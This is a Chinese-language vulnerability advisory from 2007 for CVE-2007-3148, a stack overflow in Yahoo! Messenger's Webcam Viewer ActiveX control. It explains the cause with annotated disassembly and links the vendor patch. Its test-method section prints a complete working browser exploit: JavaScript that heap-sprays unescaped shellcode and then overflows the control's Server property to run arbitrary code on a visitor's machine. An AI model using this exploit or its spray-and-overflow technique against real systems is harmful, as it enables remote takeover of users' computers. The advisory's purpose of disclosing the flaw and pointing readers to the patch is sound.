安全研究
安全漏洞
雅虎通Webcam Viewer ActiveX控件远程栈溢出漏洞
发布日期:2007-06-07
更新日期:2007-06-08
受影响系统:
Yahoo! Messenger 8.1.0.249描述:
BUGTRAQ ID: 24355
CVE(CAN) ID: CVE-2007-3148
雅虎通是一款非常流行的即时通讯工具。
雅虎通的Webcam Viewer ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户机器。
雅虎通的Webcam Viewer(ywcvwr.dll)ActiveX控件没有正确地验证对Server属性的输入。如果用户受骗访问了恶意站点向该属性传送了超长字符串然后又调用了Receive()方式的话,就可能触发栈溢出,导致执行任意指令。
漏洞起因是ActiveX控件在仅分配了1023字节的空间后对有漏洞的字符串调用了mbscpy。
03ada506 or dword ptr [ebp-4],0FFFFFFFFh
03ada50a cmp eax,ebx
03ada50c mov dword ptr [esi+210h],eax
03ada512 je ywcupl+0xa5f4
03ada518 lea ecx,[esi+174h]
; Loads the payload into ECX
03ada51e call dword ptr [ywcupl!DllUnregisterServer+0x4b44
7c3a44b3 cmp dword ptr [ecx+18h],10h
7c3a44b7 jb MSVCP71!std::basic_string ,std::allocator>::_Myptr+0xa
7c3a44b9 mov eax,dword ptr [ecx+4]
; Payload is in EAX
7c3a44bc ret
03ada524 push eax
; push payload to the stack
03ada525 push 3FFh
; Max size of 1023
03ada52a lea eax,[ebp-414h]
; EAX = 159dfb98
; (Destination buffer Location)
03ada530 push eax
03ada531 push offset ywcupl!DllUnregisterServer+0x6498
;"WebcamServer" gets
; pushed on the stack
03ada536 lea ecx,[esi+0F8h]
; ECX loads payload
03ada53c call ywcupl+0x4a72
....
03ad4ac1 push dword ptr [ebp+14h]
; pushes our payload to the stack
03ad4ac4 push dword ptr [ebp+0Ch]
; pushes 0x159dfb98
; (Destination Buffer
; to copy payload)
03ad4ac7 call ywcupl!DllUnregisterServer+0x28f2 (03aebfa6)
03aebfa6 jmp dword ptr [ywcupl!DllUnregisterServer+0x4b9c]
; Call MSVCR71!mbscpy
这时ActiveX控件没有对server字符串变量执行边界检查便调用了mbscpy,如果该变量超长的话就可能在到达栈底的时候导致页面边界访问破坏。
到达页面边界后就会调用异常处理程序试图清除访问破坏。由于栈已被负载所溢出,因此异常处理器会加载负载并在以下代码调用:
7c9037ae push dword ptr [ebp+14h]
7c9037b1 push dword ptr [ebp+10h]
7c9037b4 push dword ptr [ebp+0Ch]
7c9037b7 push dword ptr [ebp+8]
7c9037ba mov ecx,dword ptr [ebp+18h]
; ECX loads payload
7c9037bd call ecx
; Calls payload
<*来源:Danny (server.exception@yahoo.com)
链接:http://secunia.com/advisories/25547/
http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856
http://research.eeye.com/html/advisories/published/AD20070608.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<script>
<object classid='clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277' id='target'
shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<800; x++) memory[x] = block + shellcode;
var buffer = '\x0a';
while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';
target.server = buffer;
target.receive();
</script>
</html>
http://www.milw0rm.com/exploits/4052
建议:
厂商补丁:
Yahoo!
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://messenger.yahoo.com/security_update.php?id=060707
浏览次数:3489
严重程度:0(网友投票)
绿盟科技给您安全的保障